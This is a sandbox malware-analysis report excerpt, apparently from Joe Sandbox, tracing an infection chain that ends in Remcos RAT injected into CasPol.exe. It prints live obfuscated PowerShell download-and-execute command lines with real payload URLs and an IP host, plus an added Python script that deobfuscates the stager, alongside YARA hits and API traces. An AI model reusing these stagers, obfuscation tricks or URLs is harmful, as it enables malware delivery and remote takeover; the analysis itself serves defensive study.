                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:22
                                                                                                            Start time:10:57:56
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:23
                                                                                                            Start time:10:57:58
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                                                                                                            Imagebase:0x13fd30000
                                                                                                            File size:2'758'280 bytes
                                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:24
                                                                                                            Start time:10:58:00
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
                                                                                                            Imagebase:0x13f6a0000
                                                                                                            File size:52'744 bytes
                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:26
                                                                                                            Start time:10:58:04
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                                                                                                            Imagebase:0xffc70000
                                                                                                            File size:168'960 bytes
                                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:27
                                                                                                            Start time:10:58:04
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:30
                                                                                                            Start time:10:58:06
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                                                                                                            Imagebase:0x13f430000
                                                                                                            File size:443'392 bytes
                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true
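
The command line above is the first-stage downloader; reading it requires undoing three layers that the sandbox only flags ("Obfuscated command line found", "PowerShell case anomaly found", "Potential PowerShell Obfuscation Via Reversed Commands"). The following Python is an added analyst example, not code from the report or from the sample, and it reproduces only the transforms visible in the command line: the `'a'+'b'` string splitting and the three `.rePLACe()` calls (`0Ql` -> `|`, `ifd` -> `'`, `opi` -> `$`), the `$VerbosePreference.ToString()[1,3]+'X'` trick that yields `ieX`, the `<<BASE64_START>>`/`<<BASE64_END>>` extraction with reversal and base64 decode that the stager applies to the filemail download, and the reversed first argument of the `VAI` invocation. The download blob used for the extraction step is constructed here; the real file was not fetched, and nothing is assumed about what `[dnlib.IO.Home]::VAI` does beyond the argument list shown (note that `'CasPol'` is among those arguments and that CasPol.exe is the process later found carrying the Remcos payload, Target IDs 31 and 34).

```python
"""Static deobfuscation of the PowerShell stager from the process tree.
Added example (analyst tooling), not the sample's or the report's code."""
import base64
import re

# Obfuscated payload string copied from the command line: the text inside the
# outer ('...') of the -command argument, before the .rePLACe() calls.
OBFUSCATED = (
    "opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'"
    "5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'"
    "fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;"
    "opiimageBytes = opiwebClient.DownloadData(opiimageUrl);"
    "opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);"
    "opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;"
    "opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);"
    "opiendIndex = opiimageText.IndexOf(opiendFlag);"
    "opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;"
    "opistartIndex += opistartFlag.Length;"
    "op'+'ibase64Length = opiendIndex - opistartIndex;"
    "opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);"
    "opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })"
    "['+'-1..-(opibase64Command.Length)];"
    "opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);"
    "opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);"
    "opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');"
    "opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, "
    "ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, "
    "ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,"
    "ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));"
)

# The three .rePLACe() calls in the order PowerShell applies them:
# [ChAr]124 = '|', [ChAr]39 = "'", [ChAr]111+[ChAr]112+[ChAr]105 = 'opi' -> '$'.
REPLACEMENTS = [("0Ql", "|"), ("ifd", "'"), ("opi", "$")]


def deobfuscate(obfuscated: str) -> str:
    """Undo the 'a'+'b' splitting, then the token substitutions."""
    text = obfuscated.replace("'+'", "")
    for needle, replacement in REPLACEMENTS:   # .NET String.Replace: ordinal, case-sensitive
        text = text.replace(needle, replacement)
    return text


def resolve_alias(preference_value: str = "SilentlyContinue") -> str:
    """Emulate ($VerbosePreference.ToString()[1,3] + 'X') -join ''.
    With the default 'SilentlyContinue', chars 1 and 3 are 'i' and 'e' -> 'ieX'."""
    return preference_value[1] + preference_value[3] + "X"


def extract_stage2(downloaded_text: str) -> bytes:
    """Emulate the marker search, reversal and base64 decode of the stager.
    The stager's '$startIndex -ge 0 -and $endIndex -gt $startIndex' is a bare
    expression, not an if: it guards nothing. Here missing markers raise."""
    start_flag, end_flag = "<<BASE64_START>>", "<<BASE64_END>>"
    start = downloaded_text.find(start_flag)
    end = downloaded_text.find(end_flag)
    if start < 0 or end <= start:
        raise ValueError("markers not found")
    start += len(start_flag)
    reversed_b64 = downloaded_text[start:end]
    return base64.b64decode(reversed_b64[::-1])


def invoke_arguments(deobfuscated: str) -> list:
    """Return the @(...) argument list of $vaiMethod.Invoke($null, ...),
    with the first element un-reversed (the stager stores it backwards)."""
    m = re.search(r"\.Invoke\(\$null, @\((.*?)\)\)", deobfuscated)
    if m is None:
        raise ValueError("Invoke call not found")
    args = re.findall(r"'([^']*)'", m.group(1))
    args[0] = args[0][::-1]
    return args


def demo_stage2() -> bytes:
    """Constructed stand-in for the filemail download: noise around a reversed
    base64 blob. The real download was not fetched."""
    payload = b"constructed stage-2 bytes, not the real assembly"
    blob = base64.b64encode(payload).decode()[::-1]
    fake_download = "<html>noise</html><<BASE64_START>>" + blob + "<<BASE64_END>>trailer"
    return extract_stage2(fake_download)


if __name__ == "__main__":
    clean = deobfuscate(OBFUSCATED)
    print(resolve_alias(), clean)
    print(invoke_arguments(clean))
    print(demo_stage2())
```

Running it yields the readable script (`$imageUrl = 'https://1017.filemail.com/...'`, `-join (...) | ForEach-Object { $_ }`, `[dnlib.IO.Home].GetMethod('VAI')`) and the 14 invoke arguments, of which the first un-reverses to the second-stage URL and the fifth is `CasPol`. The mixed-case `rePLACe`/`TOstrInG` and the `$`-less variables are there purely to defeat string signatures; `.Replace` on a .NET string is case-sensitive, so the token keys must be matched exactly as written.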

                                                                                                            Target ID:31
                                                                                                            Start time:10:58:12
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                            Imagebase:0x1140000
                                                                                                            File size:107'704 bytes
                                                                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Target ID:34
                                                                                                            Start time:10:58:29
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                            Imagebase:0x1140000
                                                                                                            File size:107'704 bytes
                                                                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                            Has exited:true

                                                                                                            Call Graph

                                                                                                            callgraph 1 Error: Graph is empty

Module: Sheet1

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet2

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet3

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: ThisWorkbook

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

All four document modules contain only the compiler-generated Attribute header that every worksheet ({00020820-...} is the Worksheet class) and workbook ({00020819-...} is the Workbook class) module carries; no Sub or Function is declared in any of them.

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000003.454133886.00000000036C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_3_36c0000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction ID: c5b2f95f45df17cee559b50390294f989fea89e60baa2a97a97a1ac92c6294bd
                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                              • Instruction Fuzzy Hash:

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:5.6%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:50%
                                                                                                              Total number of Nodes:6
                                                                                                              Total number of Limit Nodes:0
                                                                                                              execution_graph (6 nodes, two paths, both reaching URLDownloadToFileW): 7fe89a359e1 -> 7fe89a359f1 [URLDownloadToFileW] -> 7fe89a35b00; 7fe89a34b18 -> 7fe89a35a30 [URLDownloadToFileW] -> 7fe89a35b00

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493305672.000007FE89A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89a30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DownloadFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1407266417-0
                                                                                                              • Opcode ID: eb3cb3c710e1f962fdbfb4e8a09f1ac99ee710c59bf72a27f278563d4b314540
                                                                                                              • Instruction ID: 31ac8733a684d324600d360e231bb64233f975748f8e96342b6421f7af8d0670
                                                                                                              • Opcode Fuzzy Hash: eb3cb3c710e1f962fdbfb4e8a09f1ac99ee710c59bf72a27f278563d4b314540
                                                                                                              • Instruction Fuzzy Hash: A4318171918A5C8FDB58DF5CD8897A9B7E1FB69711F00826ED04ED3661CB70A805CB81

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493305672.000007FE89A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89a30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DownloadFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1407266417-0
                                                                                                              • Opcode ID: c6ee0bf9573666e773a847e77fd323e9982facfaef00df79e32ad92286ca6e6d
                                                                                                              • Instruction ID: 9a4f14232c1b2e059e178447856b2e11ce87e707a9bb793e2c1cb77754cb3312
                                                                                                              • Opcode Fuzzy Hash: c6ee0bf9573666e773a847e77fd323e9982facfaef00df79e32ad92286ca6e6d
                                                                                                              • Instruction Fuzzy Hash: 3241E47181DB889FDB19DB5C98447A9BBF0FB56321F0482AFD08DD7162CB246806C781

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: R
                                                                                                              • API String ID: 0-1466425173
                                                                                                              • Opcode ID: 46a5a66f91ef81467d14d47e92d4cfdebc84e28e3e84ebaba732d50da30d5910
                                                                                                              • Instruction ID: 8e25000fd258da1d21747cc4f5d8e1c5f4ba938458d93b1fbeefcc2990dd12aa
                                                                                                              • Opcode Fuzzy Hash: 46a5a66f91ef81467d14d47e92d4cfdebc84e28e3e84ebaba732d50da30d5910
                                                                                                              • Instruction Fuzzy Hash: 8AB10220A0EBC94FE35B9B3C58602657FE1EF57254B1901EBC48DCB1B3D9189C5AC362

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph: function at 7fe89b026e9, basic blocks 7fe89b026e9 through 7fe89b02d36 (rendered edge list omitted)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a9ce42bf2ef0d9ddff7c1eebb51274f8d0ce1c76ca0e05f3102c2d3a7ee48fa9
                                                                                                              • Instruction ID: da21b80e82cd7d34f0bfbe787b4c570a6ddf40273c282e2aef2a4e2bd5694b5f
                                                                                                              • Opcode Fuzzy Hash: a9ce42bf2ef0d9ddff7c1eebb51274f8d0ce1c76ca0e05f3102c2d3a7ee48fa9
                                                                                                              • Instruction Fuzzy Hash: 8422153090CB8D4FD7AADB6C84546797BE2FF9A344F2401AED44EC72A3CA24AC56C741
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82b2c9c96c3f71a5455166433ede86a5b4ad22410a54174d1298ab514a63d445
                                                                                                              • Instruction ID: 6fb07f106e8104683f3d23280c39414b54757be268c0cb008349422c02c8973a
                                                                                                              • Opcode Fuzzy Hash: 82b2c9c96c3f71a5455166433ede86a5b4ad22410a54174d1298ab514a63d445
                                                                                                              • Instruction Fuzzy Hash: 5492043090DBCA4FE32AAB2858512B97FE1EF47254F1910EFD48FC71A3DA186856C395

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 427 7fe89b03122-7fe89b031fb
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.493393234.000007FE89B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89B00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7fe89b00000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 87^
                                                                                                              • API String ID: 0-353096383
                                                                                                              • Opcode ID: d611122e3db4d1e68f32d9e35642bf669401cddecf814798b524f379def88f34
                                                                                                              • Instruction ID: 9d08828ed94ad2f73fc4c2de069cc21ef3f30df00ba07a3d0e75614ca427c1d2
                                                                                                              • Opcode Fuzzy Hash: d611122e3db4d1e68f32d9e35642bf669401cddecf814798b524f379def88f34
                                                                                                              • Instruction Fuzzy Hash: 14216A1090EBC50FE757A73829652A57FA1AF57258B1E00DBD489CF1B3D80C5D6AC3A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000003.520685429.0000000003030000.00000010.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_3_3030000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction ID: b21362419a6b9b9fc046785df179d27ff54a215aa8f71ec586d89c9025f003c9
                                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                              • Instruction Fuzzy Hash:

                                                                                                              Execution Graph

                                                                                                              Execution Coverage: 1.3%
                                                                                                              Dynamic/Decrypted Code Coverage: 0%
                                                                                                              Signature Coverage: 3.7%
                                                                                                              Total number of Nodes: 627
                                                                                                              Total number of Limit Nodes: 12
48032->47998 48034->48014 48036 447998 48035->48036 48040 44798e 48035->48040 48037 447174 _free 5 API calls 48036->48037 48037->48040 48038 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48039 44255e 48038->48039 48039->48018 48039->48019 48040->48038 48041 4339ac 48046 433cd7 SetUnhandledExceptionFilter 48041->48046 48043 4339b1 pre_c_initialization 48047 4447cb 20 API calls 2 library calls 48043->48047 48045 4339bc 48046->48043 48047->48045

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(Psapi), ref: 0041BCF8
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD01
                                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD1B
                                                                                                              • LoadLibraryA.KERNEL32(shcore), ref: 0041BD2D
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD30
                                                                                                              • LoadLibraryA.KERNEL32(user32), ref: 0041BD41
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD44
                                                                                                              • LoadLibraryA.KERNEL32(ntdll), ref: 0041BD55
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD58
                                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041BD65
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD68
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD78
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
